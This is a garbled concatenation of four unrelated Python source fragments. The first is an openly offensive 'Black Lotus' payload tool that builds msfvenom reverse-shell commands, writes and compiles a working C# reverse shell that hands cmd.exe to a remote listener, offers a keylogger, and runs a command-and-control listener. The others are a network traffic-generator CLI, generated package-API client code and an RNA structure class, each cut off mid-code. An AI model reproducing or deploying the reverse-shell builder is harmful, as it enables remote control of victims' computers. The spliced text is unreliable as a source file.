payload_os='Mac OS X' #MAC OS PAYLOAD elif a == "set payload 5": payload = 'cmd/unix/reverse_python' print("\033[37mPayload => \033[31m", payload) payload_os='Python' payload_extension='py' #Python payload elif a == "set payload 6": payload = 'cmd/unix/reverse_bash' print("\033[37mPayload => \033[31m", payload) payload_os='Bash' payload_extension='sh' #Bash Payload elif a == "set payload 7": payload = 'C# Reverse shell' print("\033[37mPayload => \033[31m", payload) payload_os='Windows' payload_extension='exe' # C# Payload elif a == "set payload 8": payload = 'Python Keylogger' print("\033[37mPayload => \033[31m", payload) payload_os='Windows/Linux' payload_extension='py' # Python Keylogger keylogger() #-------------------------------------------------------------------------------------------------------------- # CONFIG #-------------------------------------------------------------------------------------------------------------- elif a == "set lport": lport=input("\033[37mLPort > \033[31m") #local port elif a == "lhost": import socket import threading hostname = socket.gethostname() local_ip = socket.gethostbyname(hostname) print("\033[37mLHost: \033[31m", local_ip) elif a =="set lhost": local_ip=input("\033[37mLHost > \033[31m") elif a =="set name": payload_name=input("\033[37mName > \033[31m") elif a =="set location": payload_location=input("\033[37mDirectory > \033[31m") link_true_false="False" elif a =="link": #payload_location="/var/www/html/" #link_true_false="True" print("not supported yet") elif a == "config": print("\n\033[37m============================= \033[31mConfiguration\033[37m =============================") print("\n\033[31m>>>>>>>>>>>>>>>>>>>>") print("\033[37mPAYLOAD \033[31m> ", payload) print("\033[37mExtension \033[31m> ", payload_extension) print("\033[37mOS/SCRIPT \033[31m> ", payload_os) print("\033[37mLHost \033[31m> ", local_ip) print("\033[37mLPort \033[31m> ", lport) print("\033[37mName \033[31m> ", payload_name) print("\033[37mDirectory \033[31m> ", payload_location) print("\033[37mLink \033[31m> ", link_true_false) print("\033[31m>>>>>>>>>>>>>>>>>>>>\033[37m") print("\n") elif a == "compile": #msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf if payload == "android/meterpreter/reverse_tcp": print("\n\033[37mYour Payload is Ready:") print('\033[31msudo msfvenom -p ' + str(payload) + " LHOST=" + str(local_ip) + " LPORT=" + str(lport) + " R> " + str(payload_name) + "." + str(payload_extension)) print("\n\033[37mUse this command to generate your payload") print("\033[37m(It requires msfvenom to be installed)") elif payload == "C# Reverse shell": def master(): code1 = (r""" using System; using System.Text; using System.IO; using System.Diagnostics; using System.ComponentModel; using System.Linq; using System.Net; using System.Net.Sockets; namespace ConnectBack { public class Program { static StreamWriter streamWriter; public static void Main(string[] args) {""") code2 = (r""" { using(Stream stream = client.GetStream()) { using(StreamReader rdr = new StreamReader(stream)) { streamWriter = new StreamWriter(stream); StringBuilder strInput = new StringBuilder(); Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); //strInput.Append("\n"); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } } }""") lhost = local_ip one = str(""" " """) two = str(""" ", """) rev = (str(" using(TcpClient client = new TcpClient(" + one.strip() + lhost + two.strip() +" " + lport + "))")) name = payload_name malware_rev=open(name + ".cs","w+") #you can change the file name code_mal = str(code1 + "\n" + rev + "\n" + code2) malware_rev.write(code_mal) malware_rev.close() try: comp = (str("mcs -out:" + name + ".exe " + name + ".cs")) os.system(comp) except: os.system("sudo apt install mono-mcs") comp = (str("mcs -out:" + name + ".exe " + name + ".cs")) os.system(comp) print(str("Malware ready: \033[31m" + name + ".exe\033[37m")) file_name_byte = str(name +".exe") file_stats = os.stat(file_name_byte) print("File size: ", file_stats.st_size, " bytes!") master() else: print("\n\033[37mYour Payload is Ready:") print('\033[31msudo msfvenom -p ' + str(payload) + " LHOST=" + str(local_ip) + " LPORT=" + str(lport) + " -f " + str(payload_extension) + " > " + str(payload_name) + "." + str(payload_extension)) print("\n\033[37mUse this command to generate your payload") print("\033[37m(It requires msfvenom to be installed)") elif a == "help": help() elif a =="exit": lab = False mallab = False else: print("' " + str(a) + " '", "is not recognized as internal or external command") print("Type help to reveal the panel") elif b =="exit": mallab = False else: print("' " + str(b) + " '", "is not recognized as internal or external command") #---------------------------------------------------------------------------------------------------------------------- def reverse_server(): print("The payload is located in the same directory of Black-Lotus in the name of 'backdoor.py'") print("Open and edit it for use. Manual included in it's source code") import socket HOST = input("\n\033[37mServer LHost \033[31m>\033[37m ") # Add the ip of your machine to connect PORT = int(input("\033[37mServer LPort \033[31m>\033[37m ")) # Add the port you want it to listen server = socket.socket() server.bind((HOST, PORT)) print('\n\033[37m[\033[31m+\033[37m] Database connected') print('\033[37m[\033[31m+\033[37m] Initialising target ..') print('\033[37m[\033[31m+\033[37m] Grab a coffe, Waiting for an incoming connection ...') server.listen(1) client, client_addr = server.accept() print('\033[37m[\033[31m+\033[37m] WE HAVE A SHELL!!') print("\n\033[37m[\033[31m+\033[37m] Target '", client_addr, "' connected sucessfully") while True: command = input("\n\033[37mBlack Lotus(\033[31mRemote/shell\033[37m) \033[31m>\033[37m") command = command.encode() client.send(command) print('\n\033[37m[\033[31m*\033[37m] Command sent', command ) output = client.recv(1024) output = output.decode() print(f"Output: {output}") #---------------------------------------------------------------------------------------------------------------------- def computer_diagnostics(): import os try: import psutil except: os.system("pip3 install psutil") import psutil import platform from datetime import datetime import time def get_size(bytes, suffix="B"): """ Scale bytes to its proper format e.g: 1253656 => '1.20MB' 1253656678 => '1.17GB' """ factor = 1024 for unit
<gh_stars>1-10 import collections import copy import datetime import errno import fcntl import fnmatch import glob import inspect import json import multiprocessing import os import os.path import pprint import re from ruamel.yaml import YAML import scapy.all as scapy import signal import socket import subprocess import sys import tempfile import time import traceback import commands as bess_commands from pybess.module import * from generator.common import * import generator.modes available_cores = list(range(multiprocessing.cpu_count())) ports = dict() DEFAULT_STATS_CSV = '/tmp/bench.csv' stats_csv = DEFAULT_STATS_CSV def load_json_config(conf_path): with open(conf_path, 'r') as f: return json.load(f.read()) def load_yaml_config(conf_path): yaml = YAML(typ='safe') with open(conf_path, 'r') as f: return yaml.load(f.read()) def load_config(conf_path): # Try to guess config format from file name _, ext = os.path.splitext(conf_path) if ext.lower() == 'json': return load_json_config(conf_path) if ext.lower() in ('yaml', 'yml'): return load_yaml_config(conf_path) # Fall back onto json by default, then yaml try: return load_json_config(conf_path) except: return load_yaml_config(conf_path) def get_var_attrs(cli, var_token, partial_word): var_type = None var_desc = '' var_candidates = [] try: if var_token == 'ENABLE_DISABLE': var_type = 'endis' var_desc = 'one or more worker IDs' var_candidates = ['enable', 'disable'] elif var_token == '[BESSD_OPTS...]': var_type = 'opts' var_desc = 'bess daemon command-line options (see "bessd -h")' elif var_token == 'MODE': var_type = 'name' var_desc = 'which type of traffic to generate' try: var_candidates = ['flowgen', 'udp', 'http'] except: pass elif var_token == 'PORT': var_type = 'name' var_desc = 'a port identifier' elif var_token == 'PORT...': var_type = 'name+' var_desc = 'a port identifier' elif var_token == '[TRAFFIC_SPEC...]': var_type = 'map' elif var_token == 'CSV': var_type = 'filename' var_desc = 'a path to a csv file' elif var_token == 'CONF_FILE': var_type = 'filename' var_desc = 'configuration filename' var_candidates = bess_commands.complete_filename(partial_word) elif var_token == '[PORT_ARGS...]': var_type = 'map' var_desc = 'initial configuration for port' except socket.error as e: if e.errno in [errno.ECONNRESET, errno.EPIPE]: cli.bess.disconnect() else: raise except cli.bess.APIError: pass if var_type is None: return None else: return var_type, var_desc, var_candidates # Return (head, tail) # head: consumed string portion # tail: the rest of input line # You can assume that 'line == head + tail' def split_var(cli, var_type, line): if var_type in ['name', 'filename', 'endis', 'int']: pos = line.find(' ') if pos == -1: head = line tail = '' else: head = line[:pos] tail = line[pos:] elif var_type in ['wid+', 'name+', 'map', 'pyobj', 'opts']: head = line tail = '' else: raise cli.InternalError('type "%s" is undefined', var_type) return head, tail def _parse_map(**kwargs): return kwargs # Return (mapped_value, tail) # mapped_value: Python value/object from the consumed token(s) # tail: the rest of input line def bind_var(cli, var_type, line): head, remainder = split_var(cli, var_type, line) # default behavior val = head if var_type == 'endis': if 'enable'.startswith(val): val = 'enable' elif 'disable'.startswith(val): val = 'disable' else: raise cli.BindError('"endis" must be either "enable" or "disable"') elif var_type == 'name': if re.match(r'^[_a-zA-Z][\w]*$', val) is None: raise cli.BindError('"name" must be [_a-zA-Z][_a-zA-Z0-9]*') elif var_type == 'name+': val = sorted(list(set(head.split()))) # collect unique items for name in val: if re.match(r'^[_a-zA-Z][\w]*$', name) is None: raise cli.BindError('"name" must be [_a-zA-Z][_a-zA-Z0-9]*') elif var_type == 'filename': if val.find('\0') >= 0: raise cli.BindError('Invalid filename') elif var_type == 'map': try: val = eval('_parse_map(%s)' % head) except: raise cli.BindError('"map" should be "key=val, key=val, ..."') elif var_type == 'pyobj': try: if head.strip() == '': val = None else: val = eval(head) except: raise cli.BindError( '"pyobj" should be an object in python syntax' ' (e.g., 42, "foo", ["hello", "world"], {"bar": "baz"})') elif var_type == 'opts': val = val.split() elif var_type == 'int': try: val = int(val) except Exception: raise cli.BindError('Expected an integer') return val, remainder bessctl_cmds = [ 'monitor pipeline', ] cmdlist = list(filter(lambda x: x[0] in bessctl_cmds, bess_commands.cmdlist)) def cmd(syntax, desc=''): def cmd_decorator(func): cmdlist.append((syntax, desc, func)) return cmd_decorator @cmd('help', 'List available commands') def help(cli): for syntax, desc, _ in cmdlist: cli.fout.write(' %-50s%s\n' % (syntax, desc)) def _show_config(cli, port): sess = cli.get_session(port) cli.fout.write('Port %s\n' % (port,)) divider = '-' * (4 + len(port)) + '\n' cli.fout.write(divider) cli.fout.write('mode: %23s\n' % (sess.mode(),)) cli.fout.write(str(sess.spec()) + '\n') cli.fout.write(divider) def _show_configs(cli, ports): sorted(list(set(ports))) for port in ports: _show_config(cli, port) @cmd('show config', 'Show the current confiugration of all ports') def show_config_all(cli): _show_configs(cli, cli.ports()) @cmd('show config PORT...', 'Show the current confiugration of a port') def show_config_all(cli, ports): _show_configs(cli, ports) def _do_reset(cli): for port in cli.ports(): _stop(cli, port) with cli.bess_lock: cli.bess.pause_all() cli.bess.reset_all() cli.bess.resume_all() @cmd('reset', 'Reset trafficgen') def reset(cli): bess_commands.warn(cli, 'Going to reset everything.', _do_reset) PortRate = collections.namedtuple('PortRate', ['inc_packets', 'inc_dropped', 'inc_bytes', 'rtt_avg', 'rtt_med', 'rtt_99', 'jitter_avg', 'jitter_med', 'jitter_99', 'out_packets', 'out_dropped', 'out_bytes']) def _monitor_ports(cli, *ports): global stats_csv def get_delta(old, new): sec_diff = new['timestamp'] - old['timestamp'] return PortRate( inc_packets=(new['inc_packets'] - old['inc_packets']) / sec_diff, inc_dropped=(new['inc_dropped'] - old['inc_dropped']) / sec_diff, inc_bytes=(new['inc_bytes'] - old['inc_bytes']) / sec_diff, rtt_avg=(new['rtt_avg'] + old['rtt_avg']) / 2, rtt_med=(new['rtt_med'] + old['rtt_med']) / 2, rtt_99=(new['rtt_99'] + old['rtt_99']) / 2, jitter_avg=(new['jitter_avg'] + old['jitter_avg']) / 2, jitter_med=(new['jitter_med'] + old['jitter_med']) / 2, jitter_99=(new['jitter_99'] + old['jitter_99']) / 2, out_packets=(new['out_packets'] - old['out_packets']) / sec_diff, out_dropped=(new['out_dropped'] - old['out_dropped']) / sec_diff, out_bytes=(new['out_bytes'] - old['out_bytes']) / sec_diff) def print_header(timestamp): cli.fout.write('\n') cli.fout.write('%-20s%14s%10s%10s%15s%15s%15s%15s%15s%15s %14s%10s%10s\n' % (time.strftime('%X') + str(timestamp % 1)[1:8], 'INC Mbps', 'Mpps', 'dropped', 'Avg RTT (us)', 'Med RTT (us)', '99th RTT (us)', 'Avg Jit (us)', 'Med Jit (us)', '99th Jit (us)', 'OUT Mbps', 'Mpps', 'dropped')) cli.fout.write('%s\n' % ('-' * 186)) def print_footer(): cli.fout.write('%s\n' % ('-' * 186)) def print_delta(port, delta, timestamp): stats = (port, (delta.inc_bytes + delta.inc_packets * 24) * 8 / 1e6, delta.inc_packets / 1e6, delta.inc_dropped, delta.rtt_avg, delta.rtt_med, delta.rtt_99, delta.jitter_avg, delta.jitter_med, delta.jitter_99, (delta.out_bytes + delta.out_packets * 24) * 8 / 1e6, delta.out_packets / 1e6, delta.out_dropped) cli.fout.write('%-20s%14.1f%10.3f%10d%15.3f%15.3f%15.3f%15.3f%15.3f%15.3f ' '%14.1f%10.3f%10d\n' % stats) with open(stats_csv, 'a') as f: line = '%s,%s,%.1f,%.3f,%d,%.3f,%.3f,%.3f,%.3f,%.3f,%.3f,%.1f,%.3f,%d\n' line %= (datetime.datetime.now().isoformat(),) + stats f.write(line) def get_total(arr): total = copy.deepcopy(arr[0]) for stat in arr[1:]: total['inc_packets'] += stat['inc_packets'] total['inc_dropped'] += stat['inc_dropped'] total['inc_bytes'] += stat['inc_bytes'] total['rtt_avg'] += stat['rtt_avg'] total['rtt_med'] += stat['rtt_med'] total['rtt_99'] += stat['rtt_99'] total['jitter_avg'] += stat['jitter_avg'] total['jitter_med'] += stat['jitter_med'] total['jitter_99'] += stat['jitter_99'] total['out_packets'] += stat['out_packets'] total['out_dropped'] += stat['out_dropped'] total['out_bytes'] += stat['out_bytes'] return total def get_all_stats(cli, sess): stats = cli.bess.get_port_stats(sess.port()) try: ret = { 'inc_packets': stats.inc.packets, 'out_packets': stats.out.packets, 'inc_bytes': stats.inc.bytes, 'out_bytes': stats.out.bytes, 'inc_dropped': stats.inc.dropped, 'out_dropped': stats.out.dropped, 'timestamp': stats.timestamp, } except: ret = { 'inc_packets': 0, 'out_packets': 0, 'inc_bytes': 0, 'out_bytes': 0, 'inc_dropped': 0, 'out_dropped': 0, 'timestamp': time.time(), } rtt_now = sess.curr_rtt() if rtt_now is None: rtt_now = {'rtt_avg': 0, 'rtt_med': 0, 'rtt_99': 0, 'jitter_avg': 0, 'jitter_med': 0, 'jitter_99': 0} ret.update(rtt_now) return ret all_ports = sorted(cli.bess.list_ports().ports, key=lambda x: x.name) drivers = {} for port in all_ports: drivers[port.name] = port.driver if not ports: ports = [port.name for port in all_ports] if not ports: raise cli.CommandError('No port to monitor') cli.fout.write('Monitoring ports: %s (Send CTRL + c to stop)\n' % ', '.join(ports)) last = {} now = {} csv_header = '#' + ','.join(['time', 'port', 'inc_mbps', 'inc_mpps', 'inc_dropped', 'avg_rtt_us', 'med_rtt_us', '99th_rtt_us', 'avg_jit_us', 'med_jit_us', '99th_jit_us', 'out_mbps', 'out_mpps', 'out_dropped']) + '\n' with open(stats_csv, 'a') as f: for port in ports: line = '#port ' + port + ': ' line += str(cli.get_session(port).spec()).replace('\n', '; ') line = re.sub('\s+', ' ', line) + '\n' f.write(line) f.write(csv_header) for port in ports: sess = cli.get_session(port) last[port] = get_all_stats(cli, sess) try: while True: time.sleep(1) for port in ports: sess = cli.get_session(port) now[port] = get_all_stats(cli, sess) print_header(now[port]['timestamp']) for port in ports: print_delta('%s/%s' % (port, drivers[port]), get_delta(last[port], now[port]), now[port]['timestamp']) print_footer() if len(ports) > 1: print_delta('Total', get_delta( get_total(list(last.values())), get_total(list(now.values()))), now[port]['timestamp']) for port in ports: last[port] = now[port] except KeyboardInterrupt: pass @cmd('monitor port', 'Monitor the current traffic of all ports') def monitor_port_all(cli): _monitor_ports(cli) @cmd('monitor port PORT...', 'Monitor the current traffic of specified ports') def monitor_port_all(cli, ports): _monitor_ports(cli, *ports) @cmd('set csv CSV', 'Set the CSV file for stats output') def set_csv(cli, csv): global stats_csv stats_csv = csv def _connect_pipeline(cli, pipe): for i in range(len(pipe)): u = pipe[i] if i < len(pipe) - 1: v = pipe[i + 1] u[0].connect(v[0], u[1], v[1]) def _create_rate_limit_tree(cli, wid, resource, limit): rl_name = 'rl_pps_w%d' % (wid,) cli.bess.add_tc(rl_name, wid=wid, policy='rate_limit', resource=resource, limit={resource: limit}) return rl_name def _create_port_args(cli, port_id, num_rx_cores, num_tx_cores): global ports args = {'driver': None, 'name': port_id, 'arg': {'num_inc_q': num_rx_cores, 'num_out_q': num_tx_cores, 'size_inc_q': 2048, 'size_out_q': 2048}} args['driver'] = 'PMDPort' if port_id not in ports: raise cli.CommandError('No such port {}'.format(port_id)) for k, v in ports[port_id].items(): args['arg'][k] = v return args def _start(cli, port, mode, tmode, ts): setup_mclasses(cli, globals()) # Create the port num_tx_cores = len(ts.tx_cores) num_rx_cores = len(ts.rx_cores) num_cores = num_tx_cores + num_rx_cores port_args = _create_port_args(cli, port, num_tx_cores, num_rx_cores) with cli.bess_lock: ret
parameter `repo` when calling `packages_validate_upload_docker`") collection_formats = {} path_params = {} if 'owner' in params: path_params['owner'] = params['owner'] if 'repo' in params: path_params['repo'] = params['repo'] query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in params: body_params = params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['apikey'] return self.api_client.call_api('/packages/{owner}/{repo}/validate-upload/docker/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def packages_validate_upload_go(self, owner, repo, **kwargs): """ Validate parameters for create Go package Validate parameters for create Go package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_go(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadGo data: :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.packages_validate_upload_go_with_http_info(owner, repo, **kwargs) else: (data) = self.packages_validate_upload_go_with_http_info(owner, repo, **kwargs) return data def packages_validate_upload_go_with_http_info(self, owner, repo, **kwargs): """ Validate parameters for create Go package Validate parameters for create Go package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_go_with_http_info(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadGo data: :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['owner', 'repo', 'data'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method packages_validate_upload_go" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'owner' is set if ('owner' not in params) or (params['owner'] is None): raise ValueError("Missing the required parameter `owner` when calling `packages_validate_upload_go`") # verify the required parameter 'repo' is set if ('repo' not in params) or (params['repo'] is None): raise ValueError("Missing the required parameter `repo` when calling `packages_validate_upload_go`") collection_formats = {} path_params = {} if 'owner' in params: path_params['owner'] = params['owner'] if 'repo' in params: path_params['repo'] = params['repo'] query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in params: body_params = params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['apikey'] return self.api_client.call_api('/packages/{owner}/{repo}/validate-upload/go/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def packages_validate_upload_helm(self, owner, repo, **kwargs): """ Validate parameters for create Helm package Validate parameters for create Helm package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_helm(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadHelm data: :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.packages_validate_upload_helm_with_http_info(owner, repo, **kwargs) else: (data) = self.packages_validate_upload_helm_with_http_info(owner, repo, **kwargs) return data def packages_validate_upload_helm_with_http_info(self, owner, repo, **kwargs): """ Validate parameters for create Helm package Validate parameters for create Helm package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_helm_with_http_info(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadHelm data: :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['owner', 'repo', 'data'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method packages_validate_upload_helm" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'owner' is set if ('owner' not in params) or (params['owner'] is None): raise ValueError("Missing the required parameter `owner` when calling `packages_validate_upload_helm`") # verify the required parameter 'repo' is set if ('repo' not in params) or (params['repo'] is None): raise ValueError("Missing the required parameter `repo` when calling `packages_validate_upload_helm`") collection_formats = {} path_params = {} if 'owner' in params: path_params['owner'] = params['owner'] if 'repo' in params: path_params['repo'] = params['repo'] query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in params: body_params = params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['apikey'] return self.api_client.call_api('/packages/{owner}/{repo}/validate-upload/helm/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def packages_validate_upload_luarocks(self, owner, repo, **kwargs): """ Validate parameters for create LuaRocks package Validate parameters for create LuaRocks package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_luarocks(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadLuarocks data: :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.packages_validate_upload_luarocks_with_http_info(owner, repo, **kwargs) else: (data) = self.packages_validate_upload_luarocks_with_http_info(owner, repo, **kwargs) return data def packages_validate_upload_luarocks_with_http_info(self, owner, repo, **kwargs): """ Validate parameters for create LuaRocks package Validate parameters for create LuaRocks package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_luarocks_with_http_info(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadLuarocks data: :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['owner', 'repo', 'data'] all_params.append('callback') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method packages_validate_upload_luarocks" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'owner' is set if ('owner' not in params) or (params['owner'] is None): raise ValueError("Missing the required parameter `owner` when calling `packages_validate_upload_luarocks`") # verify the required parameter 'repo' is set if ('repo' not in params) or (params['repo'] is None): raise ValueError("Missing the required parameter `repo` when calling `packages_validate_upload_luarocks`") collection_formats = {} path_params = {} if 'owner' in params: path_params['owner'] = params['owner'] if 'repo' in params: path_params['repo'] = params['repo'] query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in params: body_params = params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['apikey'] return self.api_client.call_api('/packages/{owner}/{repo}/validate-upload/luarocks/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def packages_validate_upload_maven(self, owner, repo, **kwargs): """ Validate parameters for create Maven package Validate parameters for create Maven package This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.packages_validate_upload_maven(owner, repo, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str owner: (required) :param str repo: (required) :param PackagesValidateuploadMaven data: :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.packages_validate_upload_maven_with_http_info(owner, repo, **kwargs) else: (data) = self.packages_validate_upload_maven_with_http_info(owner,
bulges += [new_bulge] self.from_stems_and_bulges(stems, bulges) def sort_defines(self): """ Sort the defines of interior loops and stems so that the 5' region is always first. """ for k in self.defines.keys(): d = self.defines[k] if len(d) == 4: if d[0] > d[2]: new_d = [d[2], d[3], d[0], d[1]] self.defines[k] = new_d def to_dotbracket_string(self): """ Convert the BulgeGraph representation to a dot-bracket string and return it. :return: A dot-bracket representation of this BulgeGraph """ pt = self.to_pair_table() return pairtable_to_dotbracket(pt) def sorted_stem_iterator(self): """ Iterate over a list of the stems sorted by the lowest numbered nucleotide in each stem. """ stems = [d for d in self.defines if d[0] == 's'] stems.sort(key=lambda s: self.defines[s][0]) for s in stems: yield s def is_single_stranded(self, node): """ Does this node represent a single-stranded region? Single stranded regions are five-prime and three-prime unpaired regions, multiloops, and hairpins :param node: The name of the node :return: True if yes, False if no """ if node[0] == 'f' or node[0] == 't' or node[0] == 'm' or node[0] == 'h': return True else: return False def get_node_dimensions(self, node): """ Return the dimensions of a node. If the node is a stem, then the dimensions will be l where l is the length of the stem. Otherwise, see get_bulge_dimensions(node) :param node: The name of the node :return: A pair containing its dimensions """ if node[0] == 's': return (self.stem_length(node), self.stem_length(node)) """ return (self.defines[node][1] - self.defines[node][0] + 1, self.defines[node][1] - self.defines[node][0] + 1) """ else: return self.get_bulge_dimensions(node) def adjacent_stem_pairs_iterator(self): """ Iterate over all pairs of stems which are separated by some element. This will always yield triples of the form (s1, e1, s2) where s1 and s2 are the stem identifiers and e1 denotes the element that separates them. """ for d in self.defines.keys(): if len(self.edges[d]) == 2: edges = list(self.edges[d]) if edges[0][0] == 's' and edges[1][0] == 's': yield (edges[0], d, edges[1]) def stem_bp_iterator(self, stem): """ Iterate over all the base pairs in the stem. """ d = self.defines[stem] stem_length = self.stem_length(stem) for i in range(stem_length): yield (d[0] + i, d[3] - i) def get_connected_residues(self, s1, s2): """ Get the nucleotides which are connected by the element separating s1 and s2. They should be adjacent stems. The connected nucleotides are those which are spanned by a single interior loop or multiloop. In the case of an interior loop, this function will return a list of two tuples and in the case of multiloops if it will be a list of one tuple. If the two stems are not separated by a single element, then return an empty list. """ # sort the stems according to the number of their first nucleotide stems = [s1, s2] stems.sort(key=lambda x: self.defines[x][0]) c1 = self.edges[s1] c2 = self.edges[s2] # find out which edges they share common_edges = c1.intersection(c2) if len(common_edges) == 0: # not connected return [] if len(common_edges) > 1: raise Exception("Too many connections between the stems") # the element linking the two stems conn = list(common_edges)[0] # find out the sides of the stems that face the bulge (s1b, s1e) = self.get_sides(s1, conn) (s2b, s2e) = self.get_sides(s2, conn) # get the nucleotides on the side facing the stem s1_nucleotides = self.get_side_nucleotides(s1, s1b) s2_nucleotides = self.get_side_nucleotides(s2, s2b) # find out the distances between all the nucleotides flanking # the bulge dists = [] for n1 in s1_nucleotides: for n2 in s2_nucleotides: dists += [(abs(n2 - n1), n1, n2)] dists.sort() # return the ones which are closest to each other if conn[0] == 'i': return sorted([sorted(dists[0][1:]), sorted(dists[1][1:])]) else: return sorted([sorted(dists[0][1:])]) def get_side_nucleotides(self, stem, side): """ Get the nucleotide numbers on the given side of them stem. Side 0 corresponds to the 5' end of the stem whereas as side 1 corresponds to the 3' side of the stem. :param stem: The name of the stem :param side: Either 0 or 1, indicating the 5' or 3' end of the stem :return: A tuple of the nucleotide numbers on the given side of the stem. """ if side == 0: return (self.defines[stem][0], self.defines[stem][3]) elif side == 1: return (self.defines[stem][1], self.defines[stem][2]) raise Exception("Invalid side (%d) for the stem (%s)." % (stem, side)) def get_any_sides(self, e1, e2): """ Get the side of e1 that e2 is on. The only difference from the get_sides method is the fact that e1 does not have to be a stem. 0 indicates that e2 is on the side with lower numbered nucleotides and 1 indicates that e2 is on the side with greater nucleotide numbers. :param e1: The name of the first element. :param e2: The name of the second element. :return: A tuple 